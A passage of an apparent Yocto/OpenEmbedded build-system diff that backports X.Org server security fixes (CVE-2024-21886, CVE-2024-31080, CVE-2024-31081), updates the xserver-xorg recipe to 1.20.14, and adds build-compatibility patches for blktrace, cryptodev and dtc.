+ REQUEST_AT_LEAST_SIZE(xXIChangeHierarchyReq);
+@@ -465,8 +470,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = add_master(client, c, flags);
+ if (rc != Success)
+ goto unwind;
+- }
++ changes = FLUSH;
+ break;
++ }
+ case XIRemoveMaster:
+ {
+ xXIRemoveMasterInfo *r = (xXIRemoveMasterInfo *) any;
+@@ -475,8 +481,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = remove_master(client, r, flags);
+ if (rc != Success)
+ goto unwind;
+- }
++ changes = FLUSH;
+ break;
++ }
+ case XIDetachSlave:
+ {
+ xXIDetachSlaveInfo *c = (xXIDetachSlaveInfo *) any;
+@@ -485,8 +492,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = detach_slave(client, c, flags);
+ if (rc != Success)
+ goto unwind;
+- }
++ changes = CHANGED;
+ break;
++ }
+ case XIAttachSlave:
+ {
+ xXIAttachSlaveInfo *c = (xXIAttachSlaveInfo *) any;
+@@ -495,16 +503,25 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = attach_slave(client, c, flags);
+ if (rc != Success)
+ goto unwind;
++ changes = CHANGED;
++ break;
+ }
++ default:
+ break;
+ }
+
++ if (changes == FLUSH) {
++ XISendDeviceHierarchyEvent(flags);
++ memset(flags, 0, sizeof(flags));
++ changes = NO_CHANGE;
++ }
++
+ len -= any->length * 4;
+ any = (xXIAnyHierarchyChangeInfo *) ((char *) any + any->length * 4);
+ }
+
+ unwind:
+-
+- XISendDeviceHierarchyEvent(flags);
++ if (changes != NO_CHANGE)
++ XISendDeviceHierarchyEvent(flags);
+ return rc;
+ }
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch
new file mode 100644
index 0000000000..1e1c782963
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch
@@ -0,0 +1,74 @@
+From bc1fdbe46559dd947674375946bbef54dd0ce36b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Jos=C3=A9=20Exp=C3=B3sito?= <jexposit@redhat.com>
+Date: Fri, 22 Dec 2023 18:28:31 +0100
+Subject: [PATCH] Xi: do not keep linked list pointer during recursion
+
+The `DisableDevice()` function is called whenever an enabled device
+is disabled and it moves the device from the `inputInfo.devices` linked
+list to the `inputInfo.off_devices` linked list.
+
+However, its link/unlink operation has an issue during the recursive
+call to `DisableDevice()` due to the `prev` pointer pointing to a
+removed device.
+
+This issue leads to a length mismatch between the total number of
+devices and the number of device in the list, leading to a heap
+overflow and, possibly, to local privilege escalation.
+
+Simplify the code that checked whether the device passed to
+`DisableDevice()` was in `inputInfo.devices` or not and find the
+previous device after the recursion.
+
+CVE-2024-21886, ZDI-CAN-22840
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/bc1fdbe46559dd947674375946bbef54dd0ce36b]
+CVE: CVE-2024-21886
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/devices.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/dix/devices.c b/dix/devices.c
+index dca98c8d1b..389d28a23c 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -453,14 +453,20 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ {
+ DeviceIntPtr *prev, other;
+ BOOL enabled;
++ BOOL dev_in_devices_list = FALSE;
+ int flags[MAXDEVICES] = { 0 };
+
+ if (!dev->enabled)
+ return TRUE;
+
+- for (prev = &inputInfo.devices;
+- *prev && (*prev != dev); prev = &(*prev)->next);
+- if (*prev != dev)
++ for (other = inputInfo.devices; other; other = other->next) {
++ if (other == dev) {
++ dev_in_devices_list = TRUE;
++ break;
++ }
++ }
++
++ if (!dev_in_devices_list)
+ return FALSE;
+
+ TouchEndPhysicallyActiveTouches(dev);
+@@ -511,6 +517,9 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ LeaveWindow(dev);
+ SetFocusOut(dev);
+
++ for (prev = &inputInfo.devices;
++ *prev && (*prev != dev); prev = &(*prev)->next);
++
+ *prev = dev->next;
+ dev->next = inputInfo.off_devices;
+ inputInfo.off_devices = dev;
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch
new file mode 100644
index 0000000000..af607df4f0
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch
@@ -0,0 +1,57 @@
+From 26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Fri, 5 Jan 2024 09:40:27 +1000
+Subject: [PATCH] dix: when disabling a master, float disabled slaved devices
+ too
+
+Disabling a master device floats all slave devices but we didn't do this
+to already-disabled slave devices. As a result those devices kept their
+reference to the master device resulting in access to already freed
+memory if the master device was removed before the corresponding slave
+device.
+
+And to match this behavior, also forcibly reset that pointer during
+CloseDownDevices().
+
+Related to CVE-2024-21886, ZDI-CAN-22840
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8]
+CVE: CVE-2024-21886
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/devices.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/dix/devices.c b/dix/devices.c
+index 389d28a23c..84a6406d13 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -483,6 +483,13 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ flags[other->id] |= XISlaveDetached;
+ }
+ }
++
++ for (other = inputInfo.off_devices; other; other = other->next) {
++ if (!IsMaster(other) && GetMaster(other, MASTER_ATTACHED) == dev) {
++ AttachDevice(NULL, other, NULL);
++ flags[other->id] |= XISlaveDetached;
++ }
++ }
+ }
+ else {
+ for (other = inputInfo.devices; other; other = other->next) {
+@@ -1088,6 +1095,11 @@ CloseDownDevices(void)
+ dev->master = NULL;
+ }
+
++ for (dev = inputInfo.off_devices; dev; dev = dev->next) {
++ if (!IsMaster(dev) && !IsFloating(dev))
++ dev->master = NULL;
++ }
++
+ CloseDeviceList(&inputInfo.devices);
+ CloseDeviceList(&inputInfo.off_devices);
+
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch
new file mode 100644
index 0000000000..da735efb2b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch
@@ -0,0 +1,49 @@
+From 96798fc1967491c80a4d0c8d9e0a80586cb2152b Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Fri, 22 Mar 2024 18:51:45 -0700
+Subject: [PATCH] Xi: ProcXIGetSelectedEvents needs to use unswapped length to
+ send reply
+
+CVE-2024-31080
+
+Reported-by: https://debbugs.gnu.org/cgi/bugreport.cgi?bug=69762
+Fixes: 53e821ab4 ("Xi: add request processing for XIGetSelectedEvents.")
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+Part-of: <https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/1463>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/96798fc1967491c80a4d0c8d9e0a80586cb2152b]
+CVE: CVE-2024-31080
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Xi/xiselectev.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/xiselectev.c b/Xi/xiselectev.c
+index edcb8a0d36..ac14949871 100644
+--- a/Xi/xiselectev.c
++++ b/Xi/xiselectev.c
+@@ -349,6 +349,7 @@ ProcXIGetSelectedEvents(ClientPtr client)
+ InputClientsPtr others = NULL;
+ xXIEventMask *evmask = NULL;
+ DeviceIntPtr dev;
++ uint32_t length;
+
+ REQUEST(xXIGetSelectedEventsReq);
+ REQUEST_SIZE_MATCH(xXIGetSelectedEventsReq);
+@@ -418,10 +419,12 @@ ProcXIGetSelectedEvents(ClientPtr client)
+ }
+ }
+
++ /* save the value before SRepXIGetSelectedEvents swaps it */
++ length = reply.length;
+ WriteReplyToClient(client, sizeof(xXIGetSelectedEventsReply), &reply);
+
+ if (reply.num_masks)
+- WriteToClient(client, reply.length * 4, buffer);
++ WriteToClient(client, length * 4, buffer);
+
+ free(buffer);
+ return Success;
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch
new file mode 100644
index 0000000000..d2c551a0e5
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch
@@ -0,0 +1,47 @@
+From 3e77295f888c67fc7645db5d0c00926a29ffecee Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Fri, 22 Mar 2024 18:56:27 -0700
+Subject: [PATCH] Xi: ProcXIPassiveGrabDevice needs to use unswapped length to
+ send reply
+
+CVE-2024-31081
+
+Fixes: d220d6907 ("Xi: add GrabButton and GrabKeysym code.")
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+Part-of: <https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/1463>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/3e77295f888c67fc7645db5d0c00926a29ffecee]
+CVE: CVE-2024-31081
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Xi/xipassivegrab.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/xipassivegrab.c b/Xi/xipassivegrab.c
+index c9ac2f8553..896233bec2 100644
+--- a/Xi/xipassivegrab.c
++++ b/Xi/xipassivegrab.c
+@@ -93,6 +93,7 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ GrabParameters param;
+ void *tmp;
+ int mask_len;
++ uint32_t length;
+
+ REQUEST(xXIPassiveGrabDeviceReq);
+ REQUEST_FIXED_SIZE(xXIPassiveGrabDeviceReq,
+@@ -247,9 +248,11 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ }
+ }
+
++ /* save the value before SRepXIPassiveGrabDevice swaps it */
++ length = rep.length;
+ WriteReplyToClient(client, sizeof(rep), &rep);
+ if (rep.num_modifiers)
+- WriteToClient(client, rep.length * 4, modifiers_failed);
++ WriteToClient(client, length * 4, modifiers_failed);
+
+ out:
+ free(modifiers_failed);
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb
new file mode 100644
index 0000000000..04a6e734ef
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb
@@ -0,0 +1,61 @@
+require xserver-xorg.inc
+
+SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
+ file://pkgconfig.patch \
+ file://0001-test-xtest-Initialize-array-with-braces.patch \
+ file://sdksyms-no-build-path.patch \
+ file://0001-drmmode_display.c-add-missing-mi.h-include.patch \
+ file://CVE-2022-3550.patch \
+ file://CVE-2022-3551.patch \
+ file://CVE-2022-3553.patch \
+ file://CVE-2022-4283.patch \
+ file://CVE-2022-46340.patch \
+ file://CVE-2022-46341.patch \
+ file://CVE-2022-46342.patch \
+ file://CVE-2022-46343.patch \
+ file://CVE-2022-46344.patch \
+ file://CVE-2023-0494.patch \
+ file://CVE-2023-1393.patch \
+ file://CVE-2023-5367.patch \
+ file://CVE-2023-5380.patch \
+ file://CVE-2023-6377.patch \
+ file://CVE-2023-6478.patch \
+ file://CVE-2023-6816.patch \
+ file://CVE-2024-0229-1.patch \
+ file://CVE-2024-0229-2.patch \
+ file://CVE-2024-0229-3.patch \
+ file://CVE-2024-0229-4.patch \
+ file://CVE-2024-21885.patch \
+ file://CVE-2024-21886-1.patch \
+ file://CVE-2024-21886-2.patch \
+ file://CVE-2024-0408.patch \
+ file://CVE-2024-0409.patch \
+ file://CVE-2024-31081.patch \
+ file://CVE-2024-31080.patch \
+"
+SRC_URI[md5sum] = "453fc86aac8c629b3a5b77e8dcca30bf"
+SRC_URI[sha256sum] = "54b199c9280ff8bf0f73a54a759645bd0eeeda7255d1c99310d5b7595f3ac066"
+
+CFLAGS += "-fcommon"
+
+# These extensions are now integrated into the server, so declare the migration
+# path for in-place upgrades.
+
+RREPLACES_${PN} = "${PN}-extension-dri \
+ ${PN}-extension-dri2 \
+ ${PN}-extension-record \
+ ${PN}-extension-extmod \
+ ${PN}-extension-dbe \
+ "
+RPROVIDES_${PN} = "${PN}-extension-dri \
+ ${PN}-extension-dri2 \
+ ${PN}-extension-record \
+ ${PN}-extension-extmod \
+ ${PN}-extension-dbe \
+ "
+RCONFLICTS_${PN} = "${PN}-extension-dri \
+ ${PN}-extension-dri2 \
+ ${PN}-extension-record \
+ ${PN}-extension-extmod \
+ ${PN}-extension-dbe \
+ "
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb
deleted file mode 100644
index 51d959f86c..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb
+++ /dev/null
@@ -1,38 +0,0 @@
-require xserver-xorg.inc
-
-SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
- file://pkgconfig.patch \
- file://0001-test-xtest-Initialize-array-with-braces.patch \
- file://sdksyms-no-build-path.patch \
- file://0001-drmmode_display.c-add-missing-mi.h-include.patch \
- file://CVE-2020-14347.patch \
- file://CVE-2020-14346.patch \
- file://CVE-2020-14361.patch \
- file://CVE-2020-14362.patch \
- "
-SRC_URI[md5sum] = "a770aec600116444a953ff632f51f839"
-SRC_URI[sha256sum] = "d17b646bee4ba0fb7850c1cc55b18e3e8513ed5c02bdf38da7e107f84e2d0146"
-
-CFLAGS += "-fcommon"
-
-# These extensions are now integrated into the server, so declare the migration
-# path for in-place upgrades.
-
-RREPLACES_${PN} = "${PN}-extension-dri \
- ${PN}-extension-dri2 \
- ${PN}-extension-record \
- ${PN}-extension-extmod \
- ${PN}-extension-dbe \
- "
-RPROVIDES_${PN} = "${PN}-extension-dri \
- ${PN}-extension-dri2 \
- ${PN}-extension-record \
- ${PN}-extension-extmod \
- ${PN}-extension-dbe \
- "
-RCONFLICTS_${PN} = "${PN}-extension-dri \
- ${PN}-extension-dri2 \
- ${PN}-extension-record \
- ${PN}-extension-extmod \
- ${PN}-extension-dbe \
- "
diff --git a/meta/recipes-kernel/blktrace/blktrace_git.bb b/meta/recipes-kernel/blktrace/blktrace_git.bb
index 6903053b5b..2110bc75fa 100644
--- a/meta/recipes-kernel/blktrace/blktrace_git.bb
+++ b/meta/recipes-kernel/blktrace/blktrace_git.bb
@@ -1,4 +1,9 @@
SUMMARY = "Generates traces of I/O traffic on block devices"
+DESCRIPTION = "blktrace is a block layer IO tracing mechanism which provides \
+detailed information about request queue operations up to user space. There \
+are three major components: a kernel component, a utility to record the i/o \
+trace information for the kernel to user space, and utilities to analyse and \
+view the trace information."
HOMEPAGE = "http://brick.kernel.dk/snaps/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833"
@@ -9,7 +14,7 @@ SRCREV = "cca113f2fe0759b91fd6a0e10fdcda2c28f18a7e"
PV = "1.2.0+git${SRCPV}"
-SRC_URI = "git://git.kernel.dk/blktrace.git \
+SRC_URI = "git://git.kernel.dk/blktrace.git;branch=master \
file://ldflags.patch \
file://CVE-2018-10689.patch \
file://make-btt-scripts-python3-ready.patch \
diff --git a/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb b/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
index 552eb6abaa..d7c7918515 100644
--- a/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
+++ b/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
@@ -9,6 +9,9 @@ DEPENDS += "cryptodev-linux"
SRC_URI += " \
file://0001-Disable-installing-header-file-provided-by-another-p.patch \
+file://0001-Fix-build-for-Linux-5.8-rc1.patch \
+file://0001-Fix-build-for-Linux-5.9-rc1.patch \
+file://fix-build-for-Linux-5.11-rc1.patch \
"
EXTRA_OEMAKE='KERNEL_DIR="${STAGING_KERNEL_DIR}" PREFIX="${D}"'
diff --git a/meta/recipes-kernel/cryptodev/cryptodev.inc b/meta/recipes-kernel/cryptodev/cryptodev.inc
index f99f8bc9f0..f02619cabe 100644
--- a/meta/recipes-kernel/cryptodev/cryptodev.inc
+++ b/meta/recipes-kernel/cryptodev/cryptodev.inc
@@ -1,9 +1,14 @@
HOMEPAGE = "http://cryptodev-linux.org/"
+DESCRIPTION = "Cryptodev-linux is a device that allows access to Linux kernel \
+cryptographic drivers; thus allowing of userspace applications to take advantage \
+of hardware accelerators. Cryptodev-linux is implemented as a standalone \
+module that requires no dependencies other than a stock linux kernel. Its \
+API is compatible with OpenBSD's cryptodev userspace API (/dev/crypto)."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux \
+SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux;branch=master;protocol=https \
"
SRCREV = "a87053bee5680878c295b7d23cf0d7065576ac2b"
diff --git a/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch
new file mode 100644
index 0000000000..02c721a4f3
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch
@@ -0,0 +1,49 @@
+From 9e765068582aae3696520346a7500322ca6cc2de Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Sat, 13 Jun 2020 19:46:44 +0200
+Subject: [PATCH] Fix build for Linux 5.8-rc1
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9740ca4e95b43b91a4a848694a20d01ba6818f7b
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=da1c55f1b272f4bd54671d459b39ea7b54944ef9
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d8ed45c5dcd455fc5848d47f86883a1b872ac0d0
+
+Signed-off-by: Joan Bruguera <joanbrugueram@gmail.com>
+
+Upstream-Status: Backport [9e765068582aae3696520346a7500322ca6cc2de]
+
+Signed-off-by: He Zhe <zhe.he@windriver.com>
+---
+ zc.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/zc.c b/zc.c
+index ae464ff..2c286bb 100644
+--- a/zc.c
++++ b/zc.c
+@@ -58,7 +58,11 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ return 0;
+ }
+
++#if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ down_read(&mm->mmap_sem);
++#else
++ mmap_read_lock(mm);
++#endif
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 6, 0))
+ ret = get_user_pages(task, mm,
+ (unsigned long)addr, pgcount, write, 0, pg, NULL);
+@@ -74,7 +78,11 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ pg, NULL, NULL);
+ #endif
++#if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ up_read(&mm->mmap_sem);
++#else
++ mmap_read_unlock(mm);
++#endif
+ if (ret != pgcount)
+ return -EINVAL;
+
+--
+2.17.1
+
diff --git a/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch
new file mode 100644
index 0000000000..cf1c04df9e
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch
@@ -0,0 +1,42 @@
+From 2f5e08aebf9229599aae7f25db752f74221cd71d Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Fri, 14 Aug 2020 00:13:38 +0200
+Subject: [PATCH] Fix build for Linux 5.9-rc1
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64019a2e467a288a16b65ab55ddcbf58c1b00187
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bce617edecada007aee8610fbe2c14d10b8de2f6
+ https://lore.kernel.org/lkml/CAHk-=wj_V2Tps2QrMn20_W0OJF9xqNh52XSGA42s-ZJ8Y+GyKw@mail.gmail.com/
+
+Signed-off-by: Joan Bruguera <joanbrugueram@gmail.com>
+
+Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/2f5e08aebf9229599aae7f25db752f74221cd71d]
+
+Signed-off-by: Naveen Saini <naveen.kumar.saini@intel.com>
+
+---
+ zc.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/zc.c b/zc.c
+index a560db5..fdf7da1 100644
+--- a/zc.c
++++ b/zc.c
+@@ -76,10 +76,14 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ ret = get_user_pages_remote(task, mm,
+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ pg, NULL);
+-#else
++#elif (LINUX_VERSION_CODE < KERNEL_VERSION(5, 9, 0))
+ ret = get_user_pages_remote(task, mm,
+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ pg, NULL, NULL);
++#else
++ ret = get_user_pages_remote(mm,
++ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
++ pg, NULL, NULL);
+ #endif
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ up_read(&mm->mmap_sem);
+--
+2.17.1
+
diff --git a/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch b/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch
new file mode 100644
index 0000000000..3ae77cb9d6
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch
@@ -0,0 +1,32 @@
+From 55c6315058fc0dd189ffd116f2cc27ba4fa84cb6 Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Mon, 28 Dec 2020 01:41:31 +0100
+Subject: [PATCH] Fix build for Linux 5.11-rc1
+
+ksys_close was removed, as far as I can tell, close_fd replaces it.
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8760c909f54a82aaa6e76da19afe798a0c77c3c3
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1572bfdf21d4d50e51941498ffe0b56c2289f783
+
+Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/55c6315058fc0dd189ffd116f2cc27ba4fa84cb6]
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+---
+ ioctl.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/ioctl.c b/ioctl.c
+index 3d332380..95481d4f 100644
+--- a/ioctl.c
++++ b/ioctl.c
+@@ -871,8 +871,10 @@ cryptodev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg_)
+ if (unlikely(ret)) {
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 17, 0))
+ sys_close(fd);
+-#else
++#elif (LINUX_VERSION_CODE < KERNEL_VERSION(5, 11, 0))
+ ksys_close(fd);
++#else
++ close_fd(fd);
+ #endif
+ return ret;
+ }
diff --git a/meta/recipes-kernel/dtc/dtc.inc b/meta/recipes-kernel/dtc/dtc.inc
index 0650e3c82e..461ab8fbd3 100644
--- a/meta/recipes-kernel/dtc/dtc.inc
+++ b/meta/recipes-kernel/dtc/dtc.inc
@@ -5,9 +5,11 @@ SECTION = "bootloader"
LICENSE = "GPLv2 | BSD"
DEPENDS = "flex-native bison-native"
-SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git \
+SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git;branch=master \
file://make_install.patch \
+ file://0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch \
"
+
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+(\.\d+)+)"
EXTRA_OEMAKE='NO_PYTHON=1 PREFIX="${prefix}" LIBDIR="${libdir}" DESTDIR="${D}"'
diff --git a/meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch b/meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch
new file mode 100644
index 0000000000..a2deb12d4b
--- /dev/null
+++ b/meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch
@@ -0,0 +1,36 @@
+From f0119060ef1b9bd80e2cae487df1e4aedffb0e9b Mon Sep 17 00:00:00 2001
+From: Oleksiy Obitotskyy <oobitots@cisco.com>
+Date: Fri, 22 Jan 2021 09:12:48 +0200
+Subject: [PATCH] dtc: Fix Makefile to add CFLAGS not override
+
+Makefile override CFLAGS not extend them, so some of them
+missing. Sources builds out of kernel tree and probably not all
+options could be used (?). We need at least -fmacro-prefix-map/
+debug-prefix-map to eliminate absolute path in binaries.
+
+Upstream-Status: Pending
+Signed-off-by: Oleksiy Obitotskyy <oobitots@cisco.com>
+---
+ Makefile | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Makefile b/Makefile
+index 35d936f..b5b13cf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -20,10 +20,10 @@ CONFIG_LOCALVERSION =
+ # See libfdt_internal.h for details
+ ASSUME_MASK ?= 0
+
+-CPPFLAGS = -I libfdt -I . -DFDT_ASSUME_MASK=$(ASSUME_MASK)
++CPPFLAGS += -I libfdt -I . -DFDT_ASSUME_MASK=$(ASSUME_MASK)
+ WARNINGS = -Wall -Wpointer-arith -Wcast-qual -Wnested-externs \
+ -Wstrict-prototypes -Wmissing-prototypes -Wredundant-decls -Wshadow
+-CFLAGS = -g -Os $(SHAREDLIB_CFLAGS) -Werror $(WARNINGS) $(EXTRA_CFLAGS)
++CFLAGS += -g -Os $(SHAREDLIB_CFLAGS) -Werror $(WARNINGS) $(EXTRA_CFLAGS)
+
+ BISON = bison
+ LEX = flex
+--
+2.25.1
+
diff --git a/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch b/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch
new file mode 100644
index 0000000000..ec825cbf7b
--- /dev/null
+++ b/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch
@@ -0,0 +1,35 @@
+From 4827e0db6c4f7dea7f4094f49d3bb48ef6dfdc2d Mon Sep 17 00:00:00 2001
+From: David Gibson <david@gibson.dropbear.id.au>
+Date: Wed, 6 Jan 2021 14:52:26 +1100
+Subject: [PATCH] fdtdump: Fix gcc11 warning
+
+In one place, fdtdump abuses fdt_set_magic(), passing it just a small char
+array instead of the full fdt header it expects. That's relying on the
+fact that in fact fdt_set_magic() will only actually access the first 4
+bytes of the buffer.
+
+This trips a new warning in GCC 11 - and it's entirely possible it was
+always UB. So, don't do that.
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/utils/dtc/dtc.git/patch/?id=ca16a723fa9dde9c5da80dba567f48715000e77c]
+Signed-off-by: David Gibson <david@gibson.dropbear.id.au>
+---
+ fdtdump.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fdtdump.c b/fdtdump.c
+index 9613bef..d9fb374 100644
+--- a/fdtdump.c
++++ b/fdtdump.c
+@@ -217,7 +217,7 @@ int main(int argc, char *argv[])
+ char *p = buf;
+ char *endp = buf + len;
+
+- fdt_set_magic(smagic, FDT_MAGIC);
++ fdt32_st(smagic, FDT_MAGIC);
+
+ /* poor man's memmem */
+ while ((endp - p) >= FDT_MAGIC_SIZE) {
+--
+2.30.1
+
diff --git a/meta/recipes-kernel/dtc/dtc_1.6.0.bb b/meta/recipes-kernel/dtc/dtc_1.6.0.bb
index 92df70d9fc..a407137859 100644
--- a/meta/recipes-kernel/dtc/dtc_1.6.0.bb
+++ b/meta/recipes-kernel/dtc/dtc_1.6.0.bb
@@ -5,6 +5,8 @@ LIC_FILES_CHKSUM = "file://GPL;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
SRCREV = "2525da3dba9beceb96651dc2986581871dbeca30"
+SRC_URI += "file://0001-fdtdump-Fix-gcc11-warning.patch"
+
S = "${WORKDIR}/git"
